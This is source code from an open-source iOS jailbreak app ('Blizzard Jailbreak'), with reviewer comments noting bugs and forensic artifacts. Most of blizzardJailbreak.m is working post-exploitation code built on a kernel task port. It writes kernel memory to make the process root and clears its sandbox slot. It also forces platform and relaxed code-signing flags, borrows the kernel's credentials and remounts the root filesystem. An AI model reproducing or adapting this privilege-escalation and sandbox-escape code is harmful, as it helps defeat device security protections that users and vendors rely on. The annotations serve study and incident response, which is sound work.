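// When 1, runJailbreak takes the un-jailbreak path on the iOS <= 11.4 branch.
// Not assigned in this file; presumably set by another view before this one loads.
int shouldUnjailbreak = 0;

// Redirects stdout into the log view (unless IS_BLIZZARD_DEBUG is 1) and starts the run
// on a background queue so the blocking work does not stall the UI.
- (void)viewDidLoad {
    [super viewDidLoad];
    if (IS_BLIZZARD_DEBUG != 1) {
        [self redirectSTD:STDOUT_FILENO];
    }
    [self scrollLogToBottom];
    dispatch_async(dispatch_get_global_queue(0, 0), ^{
        [self runJailbreak];
    });
}

// Scrolls the log view to its last character; does nothing while the view is empty.
- (void)scrollLogToBottom {
    NSUInteger length = self.uiLogView.text.length;
    if (length == 0) {
        // length - 1 would wrap around (NSUInteger is unsigned) and yield an invalid range.
        return;
    }
    [self.uiLogView scrollRangeToVisible:NSMakeRange(length - 1, 1)];
}

// Retitles the dismiss button. runJailbreak runs on a background queue and UIKit
// objects may only be touched on the main thread, so the change is dispatched there.
- (void)showRebootButton {
    dispatch_async(dispatch_get_main_queue(), ^{
        [self.dismissLog setTitle:@"REBOOT DEVICE" forState:UIControlStateNormal];
    });
}

// Runs the version-specific flow. Called from viewDidLoad on a global queue.
//   iOS <= 11.4: ios11_exploit_init(), then either the un-jailbreak path or the
//                remount / snapshot path.
//   iOS <= 13.7: the persistent task-port flow below.
//   Anything newer: nothing happens.
// Progress is reported only through printf, which lands in the log view once stdout
// has been redirected.
- (void)runJailbreak {
    if (currentVer("11.4")) {
        if (ios11_exploit_init() == 0) {
            if (shouldUnjailbreak == 1) {
                if (unjailbreakBlizzard() == 0) {
                    dismissButtonActionType = 1;
                    printf("Unjailbroken!\n");
                    [self showRebootButton];
                }
                return;
            }
            // NOTE(review): the else branch also runs when remountFileSystem() failed, not
            // only when no reboot is needed; the shouldUnjailbreak test is redundant after
            // the early return above. shouldReboot is defined outside this file.
            if (remountFileSystem() == 0 && shouldReboot == 1 && shouldUnjailbreak != 1) {
                dismissButtonActionType = 1;
                [self showRebootButton];
            } else {
                printf("Used the old remount, tee hee\n");
                installBootStrap();
                cleanupAfterBlizzard();
            }
        }
    } else if (currentVer("13.7")) {
        extern char *get_current_deviceModel(void);
        printf("Model: %s\n", get_current_deviceModel());
        printf("Version: %s\n", [[[UIDevice currentDevice] systemVersion] UTF8String]);
        extern uint64_t kaslr;
        extern mach_port_t tfp0_port;
        // Activate tfp0-persis program
        mach_port_t midi_bsport = 0;
        extern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);
        bootstrap_look_up(bootstrap_port, "com.apple.midiserver", &midi_bsport);
        if (!midi_bsport) {
            //printf("run_exploit_or_achieve_tf0 failed: bootstrap_look_up has problem\n");
            // NOTE(review): the app terminates here without leaving any message in the log.
            exit(1);
        }
        mach_port_t stored_ports[3] = {0};
        stored_ports[0] = mach_task_self();
        stored_ports[2] = midi_bsport;
        // NOTE(review): the kern_return_t of this call and of task_get_special_port below
        // is discarded; a failure only shows up indirectly as tfp0_port == 0.
        mach_ports_register(mach_task_self(), stored_ports, 3);
        // Waiting for installation
        sleep(2);
        tfp0_port = 0;
        task_get_special_port(mach_task_self(), TASK_ACCESS_PORT, &tfp0_port);
        if (tfp0_port == 0) {
            printf("require to run exploit first\n");
            extern bool check_device_compatibility(void);
            if (check_device_compatibility() == false) {
                printf("Execution pause: Not found offsets set for current device(model: %s)\n", get_current_deviceModel());
                return;
            }
            // NOTE(review): exploit_start is declared but never called in this method.
            extern void exploit_start(void);
            iOS13_exploit_init();
            printf("persis tfp0 installed, you can quit app now...\n");
            return;
        }
        stored_ports[2] = 0;
        mach_ports_register(mach_task_self(), stored_ports, 3);
        printf("tfp0: 0x%x\n", tfp0_port);
        // NOTE(review): pid_for_task stores an int, so only 32 bits of the 64-bit kaslr
        // are written through this cast, and the return code is not checked.
        pid_for_task(tfp0_port, (int*)&kaslr);
        printf("kaslr: 0x%x\n", (uint32_t)kaslr);
    }
}

// Dismiss button handler: closes the log view (action type 0) or shows the reboot
// alert (action type 1). Any other value does nothing.
- (IBAction)dismissLogWindow:(id)sender {
    if (dismissButtonActionType == 0) {
        [self dismissViewControllerAnimated:YES completion:nil];
    } else if (dismissButtonActionType == 1) {
        [self loadSystemNotif];
    }
}

// Keeps the newest output visible whenever the text view reports a change.
- (void)textViewDidChange:(UITextView *)textView
{
    [self scrollLogToBottom];
}

// Receives one chunk read from the stdout pipe, appends it to the log view and
// re-arms the background read.
- (void)redirectNotificationHandle:(NSNotification *)nf {
    NSData *data = [[nf userInfo] objectForKey:NSFileHandleNotificationDataItem];
    if (data.length > 0) {
        NSString *str = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
        if (str == nil) {
            // A chunk can end in the middle of a multi-byte sequence or not be UTF-8 at
            // all; decode it lossily rather than appending "(null)" to the log.
            str = [[NSString alloc] initWithData:data encoding:NSISOLatin1StringEncoding];
        }
        self.uiLogView.text = [NSString stringWithFormat:@"%@\n%@", self.uiLogView.text, str];
        [self scrollLogToBottom];
    }
    [[nf object] readInBackgroundAndNotify];
}

// Points file descriptor fd at the write end of a new pipe and delivers whatever is
// written to it to redirectNotificationHandle:. stdout is switched to unbuffered so
// printf output shows up immediately.
- (void)redirectSTD:(int)fd {
    setvbuf(stdout, nil, _IONBF, 0);
    NSPipe *pipe = [NSPipe pipe];
    NSFileHandle *pipeReadHandle = [pipe fileHandleForReading];
    if (dup2([[pipe fileHandleForWriting] fileDescriptor], fd) == -1) {
        // fd still refers to the original stream, so nothing will ever arrive on the pipe.
        return;
    }
    [[NSNotificationCenter defaultCenter] addObserver:self
                                             selector:@selector(redirectNotificationHandle:)
                                                 name:NSFileHandleReadCompletionNotification
                                               object:pipeReadHandle];
    [pipeReadHandle readInBackgroundAndNotify];
}

// Shows the snapshot-renamed alert on the main thread; its only action reboots the device.
// NOTE(review): RB_NOSYNC asks reboot() to skip the filesystem sync, so unwritten data
// may be lost - confirm this is deliberate right after a snapshot rename.
- (void)loadSystemNotif {
    dispatch_async(dispatch_get_main_queue(), ^{
        UIAlertController *apfsNoticeController = [UIAlertController alertControllerWithTitle:(@"Blizzard Jailbreak") message:(@"The APFS Snapshot has been successfully renamed! Your device will reboot now. If you wanna jailbreak, please come back to the app and re-jailbreak upon reboot.") preferredStyle:UIAlertControllerStyleAlert];
        [apfsNoticeController addAction:[UIAlertAction actionWithTitle:(@"Dismiss") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
            reboot(RB_NOSYNC);
        }]];
        [self presentViewController:apfsNoticeController animated:YES completion:nil];
    });
}
@end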
================================================
FILE: Blizzard Jailbreak/BlizzardSpawnerTools.c
================================================
//
// BlizzardSpawnerTools.c
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/11/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#include "BlizzardSpawnerTools.h"
#import <string.h>
#import <stdlib.h>
#import <stdio.h>
#import <unistd.h>
#import <spawn.h>
#import <sys/mman.h>
#import <sys/attr.h>
#import <mach/mach.h>
#import <sys/types.h>
#import <CommonCrypto/CommonDigest.h>
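/**
 * Spawns the executable at `whom` in a suspended state.
 *
 * The path is handed to posix_spawn() as given (no PATH search) and `env` is passed
 * through unchanged, so both must come from a trusted source.
 *
 * @param whom        Path of the executable; also used as argv[0].
 * @param arg1..arg6  Optional arguments; the first NULL one ends the argument list.
 * @param env         NULL-terminated environment for the child.
 * @return The child's pid on success, otherwise the non-zero error number reported by
 *         the spawn-attribute setup or by posix_spawn(). The two ranges overlap, so a
 *         caller cannot tell a small pid from an errno value by the number alone.
 *
 * The child stays suspended until the caller resumes or kills it; nothing here waits
 * for it or reaps it.
 */
int launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {
    char *argv[] = {whom, arg1, arg2, arg3, arg4, arg5, arg6, NULL};
    pid_t process_pid = 0;
    posix_spawnattr_t attr;

    int rc = posix_spawnattr_init(&attr);
    if (rc != 0) {
        return rc;
    }

    rc = posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);
    if (rc == 0) {
        rc = posix_spawn(&process_pid, whom, NULL, &attr, argv, env);
    }

    /* The attribute object owns resources on some platforms; release it on every path. */
    posix_spawnattr_destroy(&attr);

    return rc != 0 ? rc : process_pid;
}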
================================================
FILE: Blizzard Jailbreak/BlizzardSpawnerTools.h
================================================
//
// BlizzardSpawnerTools.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/11/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#ifndef BlizzardSpawnerTools_h
#define BlizzardSpawnerTools_h
#include <stdio.h>
/**
 * Spawns the executable at `whom` with POSIX_SPAWN_START_SUSPENDED set.
 *
 * @param whom        Path of the executable; also passed as argv[0].
 * @param arg1..arg6  Optional arguments; the first NULL one ends the argument list.
 * @param env         Environment handed to posix_spawn() unchanged.
 * @return The child's pid on success, otherwise posix_spawn()'s non-zero error number
 *         (the two cannot be told apart by value alone).
 */
int launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
#endif /* BlizzardSpawnerTools_h */
================================================
FILE: Blizzard Jailbreak/Info.plist
================================================
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleDisplayName</key>
<string>BLIZZARD</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1</string>
<key>LSRequiresIPhoneOS</key>
<true/>
<key>UILaunchStoryboardName</key>
<string>LaunchScreen</string>
<key>UIMainStoryboardFile</key>
<string>Main</string>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UIRequiresFullScreen</key>
<true/>
<key>UIStatusBarStyle</key>
<string>UIStatusBarStyleLightContent</string>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
</array>
<key>UISupportedInterfaceOrientations~ipad</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
<string>UIInterfaceOrientationPortraitUpsideDown</string>
<string>UIInterfaceOrientationLandscapeLeft</string>
<string>UIInterfaceOrientationLandscapeRight</string>
</array>
<key>UIViewControllerBasedStatusBarAppearance</key>
<false/>
</dict>
</plist>
================================================
FILE: Blizzard Jailbreak/blizzardJailbreak.h
================================================
//
// blizzardJailbreak.h
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#ifndef blizzardJailbreak_h
#define blizzardJailbreak_h
#include <stdio.h>
// NOTE(review): this header uses mach_port_t, uint64_t and pid_t but includes only
// <stdio.h>; it compiles only when the including file has already pulled in the Mach
// and integer type headers.

// Task port that ios11_exploit_init() obtains from get_tfp0(); defined in blizzardJailbreak.m.
extern mach_port_t tfp0;
// NOTE(review): no definition of remountFirstStepSys appears in blizzardJailbreak.m.
void remountFirstStepSys(void);
// Runs the iOS 11 setup sequence. Returns 0 on success, -1 without a valid tfp0,
// 2 without a kernel base, 3 when patchfinder setup fails.
int ios11_exploit_init(void);
// Zeroes the calling process's uid/gid fields in its kernel proc and ucred. 0 or -1.
int rootifyOurselves(void);
// Stub in blizzardJailbreak.m: does nothing and returns 0.
int rootifyProcessByPid(void);
// Writes `creds` back into the sandbox slot of pid's credential label. 0 or -1.
int restoreProcessCredentials(uint64_t creds, pid_t pid);
// NOTE(review): no definition of obtainAPFSSnapshotsList appears in blizzardJailbreak.m.
int obtainAPFSSnapshotsList(void);
// Wraps remountRootFS(): 0 on success, -1 on any failure.
int remountFileSystem(void);
// Rewrites pid's code-signing flags in its kernel proc. 0 or -1 (0 also for pid 0).
int setcsflags(pid_t pid);
// Copies and decompresses the kernelcache, then initialises the patchfinder. 0 or 4.
int prepareKernelForPatchFinder(void);
// Restores the saved sandbox slot and shuts down kexecute and the patchfinder. Always 0.
int cleanupAfterBlizzard(void);
// Creates the "Calm-Before-The-Storm" APFS snapshot of / if it does not exist. 0 or -1.
int installBootStrap(void);
// Returns the cached kernel address read for the current task's BSD info.
uint64_t findOurOwnProcess(void);
// Zeroes the sandbox slot of proc_pid's credential label and returns its old value;
// failures come back as (uint64_t)-1 or (uint64_t)-2.
uint64_t escapeSandboxForProcess(pid_t proc_pid);
// Points the first process's ucred at the donor's and returns the previous pointer,
// or (uint64_t)-1 on failure.
uint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess);
#endif /* blizzardJailbreak_h */
================================================
FILE: Blizzard Jailbreak/blizzardJailbreak.m
================================================
//
// blizzardJailbreak.m
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import <Foundation/Foundation.h>
#include "blizzardJailbreak.h"
#include "../Exploits/sock_port/exploit.h"
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <netinet/in.h>
#include <mach/mach.h>
#include <sys/mman.h>
#include <spawn.h>
#include "../Exploits/sock_port/kernel_memory.h"
#include "../Exploits/sock_port/offsetof.h"
#include "../Exploits/sock_port/offsets.h"
#include "../PatchFinder/patchfinder64.h"
#include "../Kernel Utilities/kernel_utils.h"
#include "../Kernel Utilities/kexecute.h"
#include "BlizzardLog.h"
#include "../APFS Utilities/rootfs_remount.h"
#include "../APFS Utilities/snapshot_tools.h"
#include "../Kernel Utilities/kernSymbolication.h"
#include "../AMFI Utilities/amfi_utils.h"
// Builds the absolute path of `obj` (a C string literal) inside the app bundle.
// The result comes from strdup(), so the caller owns it and must free() it.
#define BlizzardJailbreakPath(obj) strdup([[[[NSBundle mainBundle] bundlePath] stringByAppendingPathComponent:@obj] UTF8String])
// Value installBootStrap() compares verifySnapshot()'s result against.
// NOTE(review): a mutable global used as a constant; an enum or #define would prevent
// accidental modification.
int APFS_SNAPSHOT_EXISTS = 1;
// Task port stored by ios11_exploit_init() from get_tfp0().
mach_port_t tfp0 = 0;
// Result of grabKernelBase(), stored by ios11_exploit_init().
uint64_t KernelBase;
// Sandbox-slot value returned by escapeSandboxForProcess(getpid()); cleanupAfterBlizzard()
// writes it back.
uint64_t defaultCredentials;
// Result of findOurOwnProcess(), stored by ios11_exploit_init().
uint64_t ourProc;
/*
 * Edits the kernel structures of process `pid`: sets bit 0x400 in the task flags
 * reached through proc + off_task, and ORs 0x24004001 into the proc's code-signing
 * flags. pid 0 is ignored. Nothing is returned and nothing is read back afterwards.
 *
 * These bits are normally the result of code-signing validation, so a third-party
 * process that reports them is a sign of this kind of tampering.
 *
 * NOTE(review): proc_of_pid()'s result is used without a check; if it can return 0
 * for an unknown pid, the reads and writes below go to small offsets from address 0.
 * NOTE(review): 0x24004001 looks like CS_SIGNED | CS_PLATFORM_BINARY |
 * CS_ENTITLEMENTS_VALIDATED | CS_VALID; the named constants setcsflags() already uses
 * would make that checkable - confirm against the SDK headers.
 */
void platformize(pid_t pid) {
if (!pid) return;
uint64_t proc = proc_of_pid(pid);
uint64_t task = rk64(proc + off_task);
uint32_t t_flags = rk32(task + off_t_flags);
t_flags |= 0x400; // add TF_PLATFORM flag, = 0x400
wk32(task+off_t_flags, t_flags);
uint32_t csflags = rk32(proc + off_p_csflags);
wk32(proc + off_p_csflags, csflags | 0x24004001u); //patch csflags
}
/*
 * Entry point of the iOS 11 flow. Obtains a task port from get_tfp0(), initialises the
 * kernel helpers, records the kernel base and slide, prepares the patchfinder, then
 * changes this process's credentials, sandbox slot and code-signing flags.
 *
 * Returns 0 on success, -1 when no valid port was obtained, 2 when the kernel base
 * could not be found, 3 when prepareKernelForPatchFinder() failed.
 *
 * NOTE(review): the results of rootifyOurselves(), escapeSandboxForProcess() and
 * setcsflags() are not checked. escapeSandboxForProcess() reports failure as
 * (uint64_t)-1 / -2, and that value would be kept in defaultCredentials and later
 * written back by cleanupAfterBlizzard().
 * NOTE(review): the early returns with 2 and 3 leave the kernel helpers initialised;
 * nothing visible here tears them down on those paths.
 */
int ios11_exploit_init(){
printf("Blizzard Jailbreak\nby GeoSn0w (@FCE365)\n\nAn Open-Source Jailbreak for you to study and dissect :-)\n\n");
tfp0 = get_tfp0();
if (MACH_PORT_VALID(tfp0)){
printf("Successfully got tfp0!\n");
init_kernel_utils(tfp0);
KernelBase = grabKernelBase();
if (!KernelBase) {
printf("ERROR: Failed to find kernel base\n");
return 2;
}
// The constant is presumably the unslid kernel base for these builds - confirm.
// The difference is truncated to 32 bits before it is stored.
kernel_slide = (uint32_t)(KernelBase - 0xFFFFFFF007004000);
int ret = prepareKernelForPatchFinder(); // patchfinder
if (ret != 0) {
printf("Failed to initialize patchfinder\n");
return 3;
}
printf("Initialized patchfinder\n");
ourProc = findOurOwnProcess();
rootifyOurselves();
// Keep the previous sandbox-slot value so cleanupAfterBlizzard() can put it back.
defaultCredentials = escapeSandboxForProcess(getpid());
initializeKernelExecute();
uint64_t kern_proc = proc_of_pid(0);
printf("Kernel Proc is: 0x%llx\n", kern_proc);
setcsflags(getpid()); // set some csflags
platformize(getpid()); // set TF_PLATFORM
return 0;
} else {
printf("ERROR: Could not get tfp0!\n");
return -1;
}
}
/*
 * Undoes the temporary state set up by ios11_exploit_init(): writes the saved
 * sandbox-slot value back for this process, then shuts down the kernel-execute helper
 * and the patchfinder. Always returns 0.
 *
 * NOTE(review): restoreProcessCredentials() can return -1, but its result is dropped,
 * so a failed restore is reported to the caller as success.
 */
int cleanupAfterBlizzard(){
restoreProcessCredentials(defaultCredentials, getpid()); // Give back our process' credentials, otherwise the device will act weird.
terminateKernelExecute(); // Always clean up after your jailbreak components. Helps stability a lot.
terminatePatchFinder();
return 0;
}
/*
 * Overwrites the calling process's identity fields in kernel memory: the uid/gid
 * fields of its proc, and the uid, gid, saved ids and group list of its ucred, are
 * all set to 0 (the group count is set to 1). Prints the UID/EUID before and after.
 *
 * Returns 0 when the check at the end passes, -1 otherwise.
 *
 * NOTE(review): the check only tests that neither getuid() nor geteuid() is 501
 * (presumably the unprivileged "mobile" user); it does not confirm the ids are 0, and
 * it would report success for any process that did not start as 501.
 * NOTE(review): proc and ucred are used without a zero check.
 */
int rootifyOurselves(){
printf("Preparing to elevate own privileges to ROOT!\n");
printf(" Current UID: %d\n", getuid());
printf(" Current EUID: %d\n", geteuid());
uint64_t proc = proc_of_pid(getpid()); // Get our PID's PROC structure.
uint64_t ucred = rk64(proc + off_p_ucred); //Get our credentials.
wk32(proc + off_p_uid, 0);
wk32(proc + off_p_ruid, 0);
wk32(proc + off_p_gid, 0);
wk32(proc + off_p_rgid, 0);
wk32(ucred + off_ucred_cr_uid, 0);
wk32(ucred + off_ucred_cr_ruid, 0);
wk32(ucred + off_ucred_cr_svuid, 0);
wk32(ucred + off_ucred_cr_ngroups, 1);
wk32(ucred + off_ucred_cr_groups, 0);
wk32(ucred + off_ucred_cr_rgid, 0);
wk32(ucred + off_ucred_cr_svgid, 0);
printf(" New UID: %d\n", getuid());
printf(" New EUID: %d\n", geteuid());
if (getuid() != 501 && geteuid() != 501){
printf("Successfully got ROOT!\n");
} else {
printf("ERROR: Failed to get ROOT!\n");
return -1;
}
return 0;
}
/*
 * Writes `creds` into the sandbox slot of the credential label belonging to process
 * `pid`, then reads the slot back.
 *
 * Returns 0 when the slot reads back non-zero, -1 when it reads back 0.
 *
 * NOTE(review): the read-back only tests for non-zero, not for equality with `creds`,
 * so an error sentinel such as (uint64_t)-1 passed in by the caller is written and
 * reported as a successful restore. Validating `creds` before the write would catch it.
 */
int restoreProcessCredentials(uint64_t creds, pid_t pid){
uint64_t proc = proc_of_pid(pid);
uint64_t ucred = rk64(proc + off_p_ucred);
uint64_t cr_label = rk64(ucred + off_ucred_cr_label);
wk64(cr_label + off_sandbox_slot, creds);
if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) != 0){
printf("Successfully restored the Sandbox!\n");
return 0;
} else {
printf("ERROR: Failed to restore the Sandbox!\n");
return -1;
}
}
/*
 * Reads the sandbox slot of the credential label of process `proc_pid`, writes 0 into
 * that slot and verifies the write by reading it back.
 *
 * Returns the slot's previous value when the read-back is 0. pid 0 is refused.
 *
 * NOTE(review): the return type is unsigned, so the failure values -1 and -2 reach the
 * caller as 0xFFFFFFFFFFFFFFFF / 0xFFFFFFFFFFFFFFFE and cannot be told apart from a
 * saved slot value without an explicit comparison; ios11_exploit_init() stores the
 * result without one.
 */
uint64_t escapeSandboxForProcess(pid_t proc_pid) {
printf("Preparing to escape the sandbox...\n");
uint64_t target_process;
uint64_t ucred;
uint64_t sb_cr_label;
uint64_t default_creds;
if (proc_pid == 0) {
printf("ERROR: Will NOT mess with Kernel's PID...\n");
return -2;
}
target_process = proc_of_pid(proc_pid);
ucred = rk64(target_process + off_p_ucred);
sb_cr_label = rk64(ucred + off_ucred_cr_label);
// Remember the current slot value before clearing it; it is the function's result.
default_creds = rk64(sb_cr_label + off_sandbox_slot);
wk64(sb_cr_label + off_sandbox_slot, 0);
/*
As far as I am aware, the first slot is used by AMFI. Sandbox should be the second.
Read Jonathan Levin's book on the Sandbox chapter for more details about the credentials.
*/
if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) == 0){
printf("Successfully escaped the Sandbox!\n");
return default_creds;
} else {
printf("ERROR: Failed to escape the Sandbox!\n");
return -1;
}
}
/*
 * Placeholder: performs no work and always returns 0.
 * NOTE(review): despite the name it takes no pid; a caller cannot distinguish this
 * stub's 0 from a real success.
 */
int rootifyProcessByPid(){
return 0;
}
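/*
 * Returns the kernel address stored at current_task + the TASK_BSD_INFO offset
 * (presumably this process's proc structure). The value is read once and cached in a
 * function-local static; later calls return the cached value without logging.
 *
 * Returns 0, after logging an error, when the kernel read yields 0; the next call
 * then tries again.
 */
uint64_t findOurOwnProcess(){
    static uint64_t self = 0;
    if (self) {
        // Already resolved on an earlier call: this is the normal path, not an error.
        return self;
    }
    self = rk64(current_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
    if (self) {
        printf("Found Ourselves at 0x%llx\n", self);
    } else {
        printf("ERROR: Cannot find our own process!\n");
    }
    return self;
}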
/*
 * Makes the proc of `processToBeGivenCreds` point at the ucred of `donorProcess` and
 * returns the pointer it held before, so the caller can put it back.
 *
 * Returns the previous ucred pointer, or (uint64_t)-1 when the guard fails.
 *
 * NOTE(review): the guard uses ||, so the write goes ahead when only one of the two
 * values is non-zero; && is what a validity check needs. It also tests procFromPID
 * and donorcred but never donorproc, and both kernel reads have already happened
 * before the guard runs. A write through a zero proc pointer risks a kernel panic.
 * NOTE(review): (uint64_t)-1 is not distinguishable from a pointer by type alone;
 * installBootStrap() writes the returned value back without checking for it.
 */
uint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess){
printf("CredentialsCopier: Giving process %d process %d's credentials...\n", processToBeGivenCreds, donorProcess);
uint64_t procFromPID = proc_of_pid(processToBeGivenCreds);
uint64_t donorproc = proc_of_pid(donorProcess);
uint64_t processCredentials = rk64(procFromPID + off_p_ucred);
uint64_t donorcred = rk64(donorproc + off_p_ucred);
if (procFromPID != 0 || donorcred != 0){
wk64(procFromPID + off_p_ucred, donorcred);
printf("CredentialsCopier: Successfully granted credentials from process!\n");
return processCredentials;
} else {
printf("CredentialsCopier: Failed to copy credentials from process!\n");
return -1;
}
}
/*
 * Calls remountRootFS() once, logs the outcome and normalises the status:
 * 0 when the remount succeeded, -1 for any non-zero result.
 */
int remountFileSystem(){
    if (remountRootFS() != 0) {
        printf("ROOT FS REMOUNT: Failed to Remount!\n");
        return -1;
    }
    printf("ROOT FS REMOUNT: Successfully remounted!\n");
    return 0;
}
/*
 * Rewrites the code-signing flags in the kernel proc of process `pid`: sets
 * CS_PLATFORM_BINARY, CS_INSTALLER, CS_GET_TASK_ALLOW and CS_DEBUGGED, clears
 * CS_RESTRICT, CS_HARD and CS_KILL, then reads the field back.
 *
 * Returns 0 when the read-back equals the value written, -1 otherwise.
 *
 * Clearing CS_HARD and CS_KILL removes the flags that make the kernel refuse or kill
 * a process whose signature becomes invalid, so a process found in this state has had
 * its code-signing enforcement altered.
 *
 * NOTE(review): for pid 0 the function returns NO, which is 0 and therefore the same
 * value as success; -1 would match the other failure path.
 * NOTE(review): proc_of_pid()'s result is not checked before it is used.
 */
int setcsflags(pid_t pid) {
if (!pid) return NO;
uint64_t proc = proc_of_pid(pid);
uint32_t csflags = rk32(proc + off_p_csflags);
uint32_t newflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);
wk32(proc + off_p_csflags, newflags);
if (rk32(proc + off_p_csflags) == newflags){
printf("Successfully set CodeSign Flags!\n");
return 0;
} else {
printf("Failed to set CodeSign Flags!\n");
return -1;
}
}
/*
 * Starts the executable at `binary` with up to six arguments and the environment
 * `env`, using posix_spawn() with default attributes and file actions.
 *
 * Returns posix_spawn()'s status: 0 on success, an error number otherwise. The child's
 * pid is discarded and the child is not waited for. The path is used exactly as given
 * (no PATH search); the first NULL argument ends the argument list.
 */
int spawnBinaryAtPath(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {
    pid_t child;
    const char* argv[] = {binary, arg1, arg2, arg3, arg4, arg5, arg6, NULL};
    return posix_spawn(&child, binary, NULL, NULL, (char **)&argv, env);
}
/*
 * Copies the system kernelcache into the app's Documents directory under a
 * timestamped name, decompresses the copy and initialises the patchfinder on the
 * resulting "<name>.dec" file.
 *
 * Returns 0 on success and 4 when the copy or the decompression fails.
 *
 * NOTE(review): the copy is judged by `error` instead of by copyItemAtPath's BOOL
 * result, which is the documented way to detect failure; `error` is also never set to
 * nil here, which only works if ARC zero-initialises it.
 * NOTE(review): both strdup() results are never freed. Whether decompressKernelCache()
 * takes ownership of its argument is not visible here - confirm before removing them.
 * NOTE(review): mkdir() asks for mode 0777 (world-writable before the umask applies)
 * and its result is ignored; the Documents directory normally exists already.
 * NOTE(review): every run leaves another kernelcache copy and its .dec file in
 * Documents; nothing in this function deletes them.
 * NOTE(review): the result of initializePatchFinderWithBase() is not checked, and the
 * path it receives points into a temporary NSString - confirm the callee copies it.
 */
int prepareKernelForPatchFinder(){
NSString *kernelNewLocation;
NSError *error;
NSFileManager *fileManager = [NSFileManager defaultManager];
NSDateFormatter *dateTimeFormat = [[NSDateFormatter alloc] init];
// "YY" is the week-based year in date format patterns ("yy" is the calendar year);
// here it only affects the generated file name.
[dateTimeFormat setDateFormat:@"dd.MM.YY:HH.mm.ss"];
NSString *PathToDocuments = [[[fileManager URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject] path];
mkdir(strdup([PathToDocuments UTF8String]), 0777);
kernelNewLocation = [PathToDocuments stringByAppendingPathComponent:[NSString stringWithFormat:@"%@_kernelcache", [dateTimeFormat stringFromDate:[NSDate date]]]];
printf("Kernel Decompression: Copying Kernel to %s\n", [kernelNewLocation UTF8String]);
[fileManager copyItemAtPath:@"/System/Library/Caches/com.apple.kernelcaches/kernelcache" toPath:kernelNewLocation error:&error];
if (error) {
printf("Kernel Decompression: Failed to copy the kernelcache with the following error: %s\n", [[error localizedDescription] UTF8String]);
return 4;
}
if (decompressKernelCache(strdup([kernelNewLocation UTF8String]))) {
printf("Kernel Decompression: Error initializing KernelSymbolFinder\n");
return 4;
}
initializePatchFinderWithBase(0, (char *)[[kernelNewLocation stringByAppendingString:@".dec"] UTF8String]);
return 0;
}
/*
 * Ensures an APFS snapshot named "Calm-Before-The-Storm" exists on "/".
 *
 * If verifySnapshot() already reports it, nothing is changed and 0 is
 * returned. Otherwise the snapshot is created while the process runs with the
 * credentials installed by copyPIDCredentials(); the saved value is written
 * back to this process's p_ucred field afterwards, whether or not the snapshot
 * was created. Returns 0 on success and -1 when creation fails.
 *
 * Artifact for responders: a snapshot with this name on the root volume is
 * what a successful run of this function leaves behind.
 */
int installBootStrap(){
    printf("Blizzard BOOTSTRAP: Preparing to Bootstrap!\n");
    printf("Blizzard BOOTSTRAP: Creating a pre-jailbreak Snapshot! This will be useful in case we wanna un-jailbreak.\n");

    if (verifySnapshot("/", "Calm-Before-The-Storm") == APFS_SNAPSHOT_EXISTS){
        printf("Blizzard BOOTSTRAP: Safety Snapshot already exists! Will not make another one :-)\n");
        return 0;
    }

    printf("Blizzard BOOTSTRAP: Temporarily setting kernel credentials\n");
    // Presumably swaps in the credentials of pid 0 and returns the previous
    // p_ucred value; confirm against the definition of copyPIDCredentials().
    uint64_t savedCreds = copyPIDCredentials(getpid(), 0);

    int status = -1;
    if (createNewAPFSSnapshot("/", "Calm-Before-The-Storm") == 0){
        list_snapshots("/");
        printf("Blizzard BOOTSTRAP: Successfully created the stock snapshot!\n");
        status = 0;
    } else {
        printf("Blizzard BOOTSTRAP: FAILED to create the stock snapshot!\n");
    }

    // Put the saved credential pointer back on both outcomes.
    uint64_t selfProc = proc_of_pid(getpid());
    wk64(selfProc + off_p_ucred, savedCreds);
    return status;
}
================================================
FILE: Blizzard Jailbreak/blizzardView.h
================================================
//
// blizzardView.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
